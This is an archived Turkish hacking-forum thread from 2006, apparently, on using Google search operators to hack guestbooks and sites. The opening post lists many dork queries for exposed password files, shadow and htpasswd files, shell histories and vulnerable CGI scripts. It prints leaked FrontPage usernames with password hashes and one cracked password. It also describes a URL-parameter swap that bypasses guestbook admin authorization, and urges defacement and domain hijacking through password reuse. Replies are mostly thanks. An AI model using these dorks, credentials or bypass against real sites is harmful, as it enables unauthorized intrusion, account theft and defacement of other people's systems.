PDA

Orijinalini görmek için tıklayınız : Google dan Gastbuch Hacking Örnekli !

SUSKUN
02-02-2006, 06:13 PM
Örnek ;

TIKLAYINIZ ([Only Registered Users Can See Links])

Not En Altda verdigim 3. yöntem daha iyi .. Hackıng denilebilir gastbuch hack kolay bır yöntem püf noktalarını bılıyorsan hersey kolaydır aslında...

Bu Yontem ILe [Only Registered Users Can See Links] ([Only Registered Users Can See Links]) Arama Motorundan Web Sitesindeki GizLenmis SifreLeri BuLabiLiriz!..


inurl:"pasword.txt"

Bircok Ziyaretci Defteri , Forum Gibi Birsey Cok Cikti Karsimiza!..


Bu şifreleri kullanarak forumların admin panelinde cirit atabilir, ziyaretçi defterlerinden kayıtlar silebilir hatta domain bile hackleyebilirsiniz.
Domain hackleme konusunu şöyle açıklayayım, bazı site sahipleri her yerde aynı şifreyi kullanır.
Yani forumdaki admin şifresi ile ziyaretçi defterindeki admin şifresi aynı olabilir. Belki domain şifresi bile aynıdır, mail şifresi aynıdır.. Yani her bir şeyleri aynı olabilir, durum böyle olunca size örne in domain i kendi sitenize yönlendirmek kalır. Kişinin hostuna erişip sitesine indexde atabilirsiniz. Yapabilecekleriniz o kadar çok ki
Ayrıca yine google arama motorunu kullanarak maillist.txt, mlist.txt, mails.txt gibi aramalarla çeşitli sitelerin maillist lerine ulaşabilirsiniz.


example 1:
allintitle: "index of/root"

example 2
inurl:"auth_user_file.txt"

diger arama sekilleri:

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurl[Only Registered Users Can See Links] filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"[Only Registered Users Can See Links]*."


top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

ALTERNATIVE INPUTS

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
[Only Registered Users Can See Links]
[Only Registered Users Can See Links]
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
[Only Registered Users Can See Links]
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
Crazy[Only Registered Users Can See Links]
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query


Bu sadece birinci yöntem


.................................................. ....................................


[Only Registered Users Can See Links] ([Only Registered Users Can See Links])

bu şekilde bir aratma yapıyoruz google'dan passların saklandıgı pwd dosyasına ulaşıyoruz bu şekilde

Örnek:
[Only Registered Users Can See Links] ([Only Registered Users Can See Links])

yukardaki linki tıklıyoruz wordda açıyoruz....

ve bize şu şekilde bir şey açılıyor

# -FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ

burdaki son 2 satırı kopyalayıp aşagıdaki siteye gidirek bu sitedeki beyaz büyük kutuya yapıştırıp Go tuşuna tıklıyoruz.
ve şifreyi bize veriyor.

login:louisa
pass:trumpet

[Only Registered Users Can See Links] ([Only Registered Users Can See Links])

Buda ikinci yöntemdi

.................................................. ................................

Buda Bomba [Only Registered Users Can See Links] %100 hack bılmeyenler de yapabılır sanıyorum ;
allta koydugum lınke gırın !

[Only Registered Users Can See Links]"xgb.*?act="&btnG=Ara&meta ([Only Registered Users Can See Links])=

Ardından acıkları olan sıteler karsınızda olacak ! baslardakılerle ugrasmayın buyuk sıtelerle ugrasın onun ıcın bıraz ılerı gıdın ! ardından sıteye gırıyoruz örneğin :
[Only Registered Users Can See Links] ([Only Registered Users Can See Links])

bu lınkı bulduk ıcınden lınk ı tıklıyoruz ! gırdıgımızde sıtenın
[Only Registered Users Can See Links] ([Only Registered Users Can See Links])
( ?act=sign ) burayı sılıyoruz onun yerıne ( ?act=admin&do=edit ) yazıp enterlıyoruz ! işte admın olarak gırdınız...[Only Registered Users Can See Links] Yazılarınızı Yazıp Edıtleyın ...
ilker18
03-16-2006, 02:57 PM
teşekkürler
KeDiCiK
03-16-2006, 03:23 PM
paylasımın için teşekkürler..
TuRC_a
03-16-2006, 03:28 PM
Tesekkurler...
burak1616
03-22-2006, 12:33 AM
paylasım icin tsk
ozal
05-03-2006, 06:23 PM
eywallah aga
kabiledden
05-07-2006, 05:35 PM
elleriniz ze sagl1k arkada_lar
exe_lans
05-07-2006, 07:52 PM
paylasımın için teşekkürler..
ENfER
05-20-2006, 08:59 AM
ya bunlar çoook eski ve artık böyle site hacklemek cok banal bişiy... yok guestbook hacliycem falan :( olmamış walla
XyByDy
05-31-2006, 05:49 PM
paylaşım içn saol
de_mound
06-01-2006, 01:51 AM
arkadaslar bu artık öyle değil google sıkıca bi güvenlik aldı ve artık googlede hack yapma sanısnız az hatta hiç yok """hackerler için geçerli değil """

bence bunun için yahoo da aratın coskun kardeesimizin dediği gibi ilk sayfalara bakmayın geçin sonraki sayfaları aratın yahoo dan daha kolay olacağına eminim eğer isterseniz sizlere yardım ederim

adersim arda_arse@hotmail.com
selcuk555
06-04-2006, 05:15 PM
Çok sağol teşekkürler...
gokmennumber2
06-12-2006, 02:02 PM
iyi bi yöntem